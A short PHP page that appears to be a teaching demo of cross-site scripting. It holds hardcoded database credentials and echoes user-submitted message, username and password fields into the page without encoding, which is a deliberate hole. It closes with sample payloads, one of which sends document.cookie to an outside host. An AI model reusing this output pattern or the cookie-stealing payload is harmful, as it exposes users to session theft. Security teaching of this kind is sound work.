<?php

// XSS example

// info in world-readable file
$link = mysql_connect ("127.0.0.1", "was", "was");
mysql_select_db("webappsec", $link);

$username = "";
$password = "";
$message = "";

if( isset( $_POST[ "username" ] ) && isset( $_POST[ "password" ] ) && isset( $_POST[ "message" ] ))
{
    $username = stripslashes( $_POST[ "username" ] );
    $password = stripslashes( $_POST[ "password" ] );
    $message = stripslashes( $_POST[ "message" ] );

    $query_safe = sprintf( "select username, id from users where username='%s' and password='%s'"
                            , mysql_real_escape_string( $username )
                            , mysql_real_escape_string( $password ) );

    $result = mysql_query( $query_safe );

    if( $result )
    {
        $user = mysql_fetch_object( $result );
        setcookie( 'userid', $user->id );
    } else {
        $user = false;
    }
}

?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Web Application Security - Cross-site Scripting Example</title>

    <link rel="stylesheet" href="wasexample.css" />
</head>
<body class="example">
    <h1>Cross-site Scripting</h1>

<?php
    if( $user )
    {
        echo "<p class=\"message\">";
        echo $message;
        echo "<cite>posted by <strong>{$user->username}</strong></cite>";
        echo "</p>";
    }
?>

    <form method="post">
        <dl>
            <dt><label for="username">Username:</label></dt>
            <dd><input type="text" name="username" value="<?php echo $username; ?>" size="20" /></dd>

            <dt><label for="password">Password:</label></dt>
            <dd><input type="password" name="password" size="20" value="<?php echo $password; ?>" /></dd>

            <dt><label for="message">Message:</label></dt>
            <dd><textarea name="message" rows="5" cols="60"><?php echo $message; ?></textarea>

            <dt><input type="submit" value="login" /></dt>
        </dl>
    </form>
    
    <ul>
        <li>&lt;script>alert( 'hello' );&lt;/script></li>
        <li>&lt;script>document.location = "http://miscellanean.com/communitech/webp2p/security/inurbase.phps?c=" + document.cookie;&lt/script></li>
    </ul>
</body></html>